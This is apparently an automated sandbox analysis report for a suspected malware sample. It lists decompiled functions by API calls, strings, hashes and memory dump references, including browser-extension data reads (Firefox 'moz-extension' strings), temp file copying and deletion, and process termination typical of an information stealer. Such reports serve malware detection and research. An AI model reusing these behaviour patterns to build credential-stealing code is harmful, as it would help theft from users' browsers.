Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: ddf3f2a18adbb903e05fa99f668a8455f4d149f38202e008718ed0b049c747ad
Instruction ID: 5ef6f13f2427e116f431ff066a6b3c1091740dcb0c0136d896a2348b2d17356b
Opcode Fuzzy Hash: ddf3f2a18adbb903e05fa99f668a8455f4d149f38202e008718ed0b049c747ad
Instruction Fuzzy Hash: C531D176E51219AFD799FFA8AC91AAD76E5AB08310F0D002EE500E72E1D770DD409BB0

Function 00D609D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D609D7
std::_Xinvalid_argument.LIBCPMT ref: 00D609FD

Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D8048D
Part of subcall function 00D80478: __CxxThrowException@8.LIBCMT ref: 00D804A2
Part of subcall function 00D80478: std::exception::exception.LIBCMT ref: 00D804B3

Part of subcall function 00D60927: malloc.MSVCRT ref: 00D60936
Part of subcall function 00D60927: __CxxThrowException@8.LIBCMT ref: 00D60951

Strings

vector<T> too long, xrefs: 00D609F8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$H_prolog3_catchXinvalid_argumentmallocstd::_
String ID: vector<T> too long
API String ID: 285619538-3788999226
Opcode ID: fd71250b597d6a1018dae60e64ccc6df329c95732dcd0356486b74a6e600cd57
Instruction ID: cb0a83dd32883387d4d9ee2eb1b9c7431bc13e6d58472fa879d63d5d8555b0c9
Opcode Fuzzy Hash: fd71250b597d6a1018dae60e64ccc6df329c95732dcd0356486b74a6e600cd57
Instruction Fuzzy Hash: 1B316B71A0070A9FCB14EF68C9819AFBBE6FF94350B148529E95AD7351DB30E905CB70

Function 00D73437 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DName::operator+=.LIBCMT ref: 00D734B1

Part of subcall function 00D70D1E: DName::operator=.LIBCMT ref: 00D70D40

DName::DName.LIBCMT ref: 00D7353E
DName::operator+.LIBCMT ref: 00D73545

Strings

(, xrefs: 00D73451

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: NameName::Name::operator+Name::operator+=Name::operator=
String ID: (
API String ID: 655566563-3887548279
Opcode ID: 6122418fecc4d3925bcdc5b6fc2609c0561c67fe578e4ba97b7ef1a4e4b5ec51
Instruction ID: bdfe3db20f6a823cf340361c95a54321734da8bf34a479ea4e8b99c7fea0cf3a
Opcode Fuzzy Hash: 6122418fecc4d3925bcdc5b6fc2609c0561c67fe578e4ba97b7ef1a4e4b5ec51
Instruction Fuzzy Hash: 0F11C471B10149CBDB0EDA64C8956FD7771AF09384F1CC17CA50AD60C0EB38DA4AE720

Function 00D639BD Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D64147,?), ref: 00D639C8
HeapAlloc.KERNEL32(00000000), ref: 00D639CF
wsprintfW.USER32 ref: 00D639E0

Strings

%hs, xrefs: 00D639DA

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 88018ae83d36e0232a4d1e722e5727a55e7e1edcd7727a0cb1a34d103a5faa7e
Instruction ID: 0c0fc7accf1ad664414c2732dadecd319e894ded1d216abbe329a5715f57df9d
Opcode Fuzzy Hash: 88018ae83d36e0232a4d1e722e5727a55e7e1edcd7727a0cb1a34d103a5faa7e
Instruction Fuzzy Hash: DED05E352503147BC61027D5AC0AA9A3B1CDB05BA2F000021FA0DD5250DA61485997F5

Function 00D513E6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00D513F2
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00D513FD
ReleaseDC.USER32(00000000,00000000), ref: 00D51406

Strings

DISPLAY, xrefs: 00D513ED

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: 69ee8fafddb13fe1aa79053f66f611ce8ff751914abfd575049bb1347a2ce346
Instruction ID: a3689a7ee7f4925756a857a6c666c95ab8e9e131a9e2b4b5fff7f4b8f91525af
Opcode Fuzzy Hash: 69ee8fafddb13fe1aa79053f66f611ce8ff751914abfd575049bb1347a2ce346
Instruction Fuzzy Hash: 98D002393D4340BBE2701765BC4FF5A2968D7C6F12F100015F705D92E44BA4154B9736

Function 00D5BF6A Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5C00F
lstrlenA.KERNEL32(?), ref: 00D5C1C5
lstrlenA.KERNEL32(?), ref: 00D5C1E0
DeleteFileA.KERNEL32(?), ref: 00D5C232

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c36747d55bb66ec11fb3134ccfa6fc63fdba18430756360f39b8fbbdabee671a
Instruction ID: af4c359d7cef5f36f4029f1796a5ba6e456eab55b49d7c7f40558f92d55c3ea5
Opcode Fuzzy Hash: c36747d55bb66ec11fb3134ccfa6fc63fdba18430756360f39b8fbbdabee671a
Instruction Fuzzy Hash: 218180329441199BCF00FBA5ED479EEB774EF09302F610421FD40B7162DA62AE1A9FB1

Function 00D5C27B Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D638A6: GetSystemTime.KERNEL32(?,00D87807,?), ref: 00D638D5

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

CopyFileA.KERNEL32(?,?,00000001), ref: 00D5C320
lstrlenA.KERNEL32(?), ref: 00D5C472
lstrlenA.KERNEL32(?), ref: 00D5C48D
DeleteFileA.KERNEL32(?), ref: 00D5C4DF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9784e5e96ba530dd5639a670584c8a0f0f3fd83e3326e7a40c5c0d11186932d4
Instruction ID: d547f30053358c38852aaf7e718a2dcb878aac2afdb5c982e2d850d54e19459c
Opcode Fuzzy Hash: 9784e5e96ba530dd5639a670584c8a0f0f3fd83e3326e7a40c5c0d11186932d4
Instruction Fuzzy Hash: 1F71A0329401199BCF00FBA5ED479EEB770EF09306F514421FD40B7262DA22AE1A9FB1

Function 00D5E401 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Part of subcall function 00D63A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00D68680,?), ref: 00D63A93

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D62265: lstrlenA.KERNEL32(?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62279
Part of subcall function 00D62265: lstrcpyA.KERNEL32(00000000,?,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622A1
Part of subcall function 00D62265: lstrcatA.KERNEL32(?,00000000,?,?,00D68FD9,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D622AC

Part of subcall function 00D621E9: lstrcpyA.KERNEL32(00000000,?,?,00D68FEB,abc_,00000000,00D87786,?,?,?,?,00D69D6E), ref: 00D62219

Part of subcall function 00D62223: lstrcpyA.KERNEL32(00000000,?,0000000C,00D69228,00D87803), ref: 00D62251
Part of subcall function 00D62223: lstrcatA.KERNEL32(?,?), ref: 00D6225B

StrStrA.SHLWAPI(00000000,?,00D88700,00D8796B), ref: 00D5E492
lstrlenA.KERNEL32(?), ref: 00D5E4A5

Strings

moz-extension+++, xrefs: 00D5E4D0
^userContextId=4294967295, xrefs: 00D5E4CA

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: abc99f2bde28f16923c55a7a502d08d109e7c33f891ab6c207080d769d41b652
Instruction ID: 6d11190d0dbf976e294181d93218260442e3578c6b7e2307653eb9ba1ad36b8c
Opcode Fuzzy Hash: abc99f2bde28f16923c55a7a502d08d109e7c33f891ab6c207080d769d41b652
Instruction Fuzzy Hash: 0F41CF32944529ABCF10FBA8DD439EDB7B4EF09305F510120FD44B3262EA25AE1D8EB1

Function 00D6D7A8 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759183C0,00000000,?,?,?,?,?,?,00D6DD71,?,00D68C76,?), ref: 00D6D7FB
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00D6DD71,?,00D68C76), ref: 00D6D82B
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00D6DD71,?,00D68C76,?), ref: 00D6D857
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00D6DD71,?,00D68C76,?), ref: 00D6D865

Part of subcall function 00D6D173: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00D6D1A7

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: 893be5713d81bc2f41dd9d808b05a226437364434719ccd6dee19bc084ca341f
Instruction ID: 32910dd027c4363d34d6435c735acf597734a983fe77039b347a8ff7f3c7728c
Opcode Fuzzy Hash: 893be5713d81bc2f41dd9d808b05a226437364434719ccd6dee19bc084ca341f
Instruction Fuzzy Hash: C64156719002099BCF10DF69D884A9EBBF9FF89310F1441AAE854EB266D3709946CFB0

Function 00D6D562 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00D6D5A7
_memmove.LIBCMT ref: 00D6D5BB
_memmove.LIBCMT ref: 00D6D608
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00D6C64D,?,00000001,?,?,?), ref: 00D6D627

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: 5e99634e881b8573a98018e6c99bfe0ee0f81047f385f4e5c765f88195416696
Instruction ID: 6175def44010df3a45bdaee4e801b9054e9668e0f1d9984f9c5694075c213afc
Opcode Fuzzy Hash: 5e99634e881b8573a98018e6c99bfe0ee0f81047f385f4e5c765f88195416696
Instruction Fuzzy Hash: 32316D71A00704AFD720CF59E980A66B7F9FB49314F44892EE98AC7A40DB70F905CB70

Function 00D640F6 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6411D

Part of subcall function 00D639BD: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D64147,?), ref: 00D639C8
Part of subcall function 00D639BD: HeapAlloc.KERNEL32(00000000), ref: 00D639CF
Part of subcall function 00D639BD: wsprintfW.USER32 ref: 00D639E0

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00D641C3
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D641D1
CloseHandle.KERNEL32(00000000), ref: 00D641D8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

